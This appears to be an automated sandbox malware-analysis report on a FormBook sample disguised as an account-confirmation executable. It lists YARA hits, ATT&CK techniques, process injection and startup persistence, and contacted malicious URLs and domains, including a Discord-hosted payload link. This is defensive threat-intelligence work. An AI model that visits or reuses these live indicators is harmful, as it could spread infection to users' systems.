          Source: Yara matchFile source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.618178805.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.620167553.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.805766092.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.653589818.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.651959941.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.652361426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.617344321.0000000005B3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.655815851.0000000000A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000000.622582494.00000000069B6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.655749775.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Valid Accounts          		1
          Shared Modules          		1
          Valid Accounts          		1
          Valid Accounts          		1
          Disable or Modify Tools          		OS Credential Dumping2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts2
          Exploitation for Client Execution          		22
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		2
          Obfuscated Files or Information          		LSASS Memory112
          System Information Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Command and Scripting Interpreter          		Logon Script (Windows)712
          Process Injection          		11
          Software Packing          		Security Account Manager211
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)22
          Registry Run Keys / Startup Folder          		11
          Masquerading          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer4
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Valid Accounts          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Modify Registry          		Cached Domain Credentials11
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)712
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Hidden Files and Directories          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 567552 Sample: Hesab#U0131 Onaylay#U0131n Startdate: 07/02/2022 Architecture: WINDOWS Score: 100 72 www.xn--fiqy4bxlx1tr92f.xn--czru2d 2->72 88 Malicious sample detected (through community Yara rule) 2->88 90 Antivirus detection for URL or domain 2->90 92 Multi AV Scanner detection for dropped file 2->92 94 6 other signatures 2->94 10 Hesab#U0131 Onaylay#U0131n.exe 15 4 2->10         started        15 java.exe 2 2->15         started        signatures3 process4 dnsIp5 78 cdn.discordapp.com 162.159.134.233, 443, 49752, 49820 CLOUDFLARENETUS United States 10->78 58 C:\...\Hesab#U0131 Onaylay#U0131n.exe.log, ASCII 10->58 dropped 128 Moves itself to temp directory 10->128 130 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->130 17 java.exe 14 4 10->17         started        22 cmd.exe 1 10->22         started        80 162.159.129.233, 443, 49811 CLOUDFLARENETUS United States 15->80 24 AddInProcess32.exe 15->24         started        file6 signatures7 process8 dnsIp9 68 162.159.135.233, 443, 49755 CLOUDFLARENETUS United States 17->68 70 cdn.discordapp.com 17->70 52 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 17->52 dropped 96 Exploit detected, runtime environment starts unknown processes 17->96 98 Exploit detected, runtime environment dropped PE file 17->98 100 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->100 26 cmd.exe 3 17->26         started        102 Uses ping.exe to sleep 22->102 104 Drops PE files to the startup folder 22->104 106 Uses ping.exe to check the status of other devices and networks 22->106 30 reg.exe 1 1 22->30         started        32 PING.EXE 1 22->32         started        35 conhost.exe 22->35         started        108 Modifies the context of a thread in another process (thread injection) 24->108 110 Maps a DLL or memory area into another process 24->110 112 Sample uses process hollowing technique 24->112 114 2 other signatures 24->114 37 explorer.exe 24->37 injected file10 signatures11 process12 dnsIp13 54 C:\Users\user\AppData\Roaming\...\java.exe, PE32 26->54 dropped 56 C:\Users\user\...\java.exe:Zone.Identifier, ASCII 26->56 dropped 122 Uses ping.exe to sleep 26->122 39 java.exe 26->39         started        43 PING.EXE 1 26->43         started        45 conhost.exe 26->45         started        47 PING.EXE 1 26->47         started        124 Creates an undocumented autostart registry key 30->124 60 127.0.0.1 unknown unknown 32->60 62 aireapartmentsmsp.com 15.197.142.173, 49823, 80 TANDEMUS United States 37->62 64 sturgisbrews.com 34.102.136.180, 49826, 80 GOOGLEUS United States 37->64 66 7 other IPs or domains 37->66 126 System process connects to network (likely due to code injection or exploit) 37->126 file14 signatures15 process16 dnsIp17 74 cdn.discordapp.com 39->74 116 Writes to foreign memory regions 39->116 118 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->118 120 Injects a PE file into a foreign processes 39->120 49 AddInProcess32.exe 39->49         started        76 192.168.2.1 unknown unknown 43->76 signatures18 process19 signatures20 82 Modifies the context of a thread in another process (thread injection) 49->82 84 Maps a DLL or memory area into another process 49->84 86 Sample uses process hollowing technique 49->86

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Hesab#U0131 Onaylay#U0131n.exe30%ReversingLabsByteCode-MSIL.Trojan.Cerbu
          Hesab#U0131 Onaylay#U0131n.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe28%ReversingLabsByteCode-MSIL.Trojan.Cerbu

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          33.0.AddInProcess32.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          33.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          33.0.AddInProcess32.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          34.0.AddInProcess32.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          34.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          33.0.AddInProcess32.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          34.0.AddInProcess32.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          34.0.AddInProcess32.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.aireapartmentsmsp.com/g43o/?j0DLG=br5CaOBNbOyEtSl01w1InJFcLjJpKSipTIGKYv8LLz1h7U2pe/W5LRlDNuBFVm8Z7kz1&zl_PqJ=KxlpdRmXzNBLJpD00%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.zhongyicts.com.cn30%Avira URL Cloudsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sturgisbrews.com/g43o/?j0DLG=HsquawsfcsgqJ94EtmUD1wYxaBGU5jkWnmyWAJcE1YBxo/BZ5yoFsc9Zh9ltV0MQdvJb&zl_PqJ=KxlpdRmXzNBLJpD00%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnh0%Avira URL Cloudsafe
          http://www.navairahotels.club/g43o/?j0DLG=bAWbi/S+VaXJXK1VOIIWAoiCvWF75BpNHpODYmQiY/o6icgk09bMbNIwGdiM5kcgz4ya&zl_PqJ=KxlpdRmXzNBLJpD0100%Avira URL Cloudphishing
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.athletes4africa.biz/g43o/?j0DLG=XuLail99yhDrYyUhKwxkqBfGD2vc/Hu9afcS26YM4Nd4m4Phs+vvTj1Fs76Yca0I+p5F&zl_PqJ=KxlpdRmXzNBLJpD0100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cns0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cno.0%URL Reputationsafe
          http://www.feasible-weld.com/g43o/?j0DLG=QkSDkAQwJsfinh3WrOYNwuLRn/wZcwP5ROix40ZEWiTyy9DSEEEXqyK/VjgFco5oKzQL&zl_PqJ=KxlpdRmXzNBLJpD00%Avira URL Cloudsafe
          http://ns.adb0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.athletes4africa.biz
          		212.123.41.108
          		truefalse
            		high
            navairahotels.club
            		34.98.99.30
            		truefalse
              		high
              aireapartmentsmsp.com
              		15.197.142.173
              		truefalse
                		high
                www.feasible-weld.com
                		104.21.21.198
                		truefalse
                  		high
                  sturgisbrews.com
                  		34.102.136.180
                  		truefalse
                    		high
                    cdn.discordapp.com
                    		162.159.134.233
                    		truefalse
                      		high
                      www.sturgisbrews.com
                      		unknown
                      		unknownfalse
                        		high
                        www.navairahotels.club
                        		unknown
                        		unknownfalse
                          		high
                          www.aireapartmentsmsp.com
                          		unknown
                          		unknownfalse
                            		high
                            www.balderzone.com
                            		unknown
                            		unknownfalse
                              		high
                              www.xn--fiqy4bxlx1tr92f.xn--czru2d
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.aireapartmentsmsp.com/g43o/?j0DLG=br5CaOBNbOyEtSl01w1InJFcLjJpKSipTIGKYv8LLz1h7U2pe/W5LRlDNuBFVm8Z7kz1&zl_PqJ=KxlpdRmXzNBLJpD0true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sturgisbrews.com/g43o/?j0DLG=HsquawsfcsgqJ94EtmUD1wYxaBGU5jkWnmyWAJcE1YBxo/BZ5yoFsc9Zh9ltV0MQdvJb&zl_PqJ=KxlpdRmXzNBLJpD0false
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.navairahotels.club/g43o/?j0DLG=bAWbi/S+VaXJXK1VOIIWAoiCvWF75BpNHpODYmQiY/o6icgk09bMbNIwGdiM5kcgz4ya&zl_PqJ=KxlpdRmXzNBLJpD0false
                                • Avira URL Cloud: phishing
                                		unknown
                                http://www.athletes4africa.biz/g43o/?j0DLG=XuLail99yhDrYyUhKwxkqBfGD2vc/Hu9afcS26YM4Nd4m4Phs+vvTj1Fs76Yca0I+p5F&zl_PqJ=KxlpdRmXzNBLJpD0true
                                • Avira URL Cloud: malware
                                		unknown
                                https://cdn.discordapp.com/attachments/939413016561205300/939787018140012564/RDifalse
                                  		high
                                  http://www.feasible-weld.com/g43o/?j0DLG=QkSDkAQwJsfinh3WrOYNwuLRn/wZcwP5ROix40ZEWiTyy9DSEEEXqyK/VjgFco5oKzQL&zl_PqJ=KxlpdRmXzNBLJpD0true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.apache.org/licenses/LICENSE-2.0Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.306783409.000000000B74B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersGHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/?Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/bTheHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ns.adobe.cobjjava.exe, 0000000F.00000003.382467142.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382207686.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.386158306.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380733322.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.387385355.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384274841.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384539153.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382536820.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381867295.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381223688.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417649932.000000000C141000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379916821.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381491238.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379844890.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380331660.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382125294.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380828460.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380258411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.388095411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381144325.000000000C14E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers?Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ns.adobe.c/gjava.exe, 0000000F.00000003.382467142.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382207686.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.386158306.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380733322.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.387385355.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384274841.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.384539153.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382536820.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381867295.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381223688.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417649932.000000000C141000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379916821.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381491238.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379844890.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.379378801.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380331660.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.382125294.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380828460.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.380258411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.388095411.000000000C14E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.381144325.000000000C14E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.discordapp.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359212510.0000000002374000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000002.423805671.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001E.00000002.575090256.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000001F.00000002.576422912.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.goodfont.co.krHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cn3Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.carterandcone.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307075934.000000000B74A000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307183444.000000000B733000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnhHesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.307183444.000000000B733000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.carterandcone.comlHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.typography.netDHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/cTheHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://fontfabrik.comHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnHesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305279851.000000000B75C000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305585833.000000000B75F000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305402723.000000000B740000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305495592.000000000B75E000.00000004.00000800.00020000.00000000.sdmp, Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.305344754.000000000B75D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlHesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.363320354.000000000C9D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
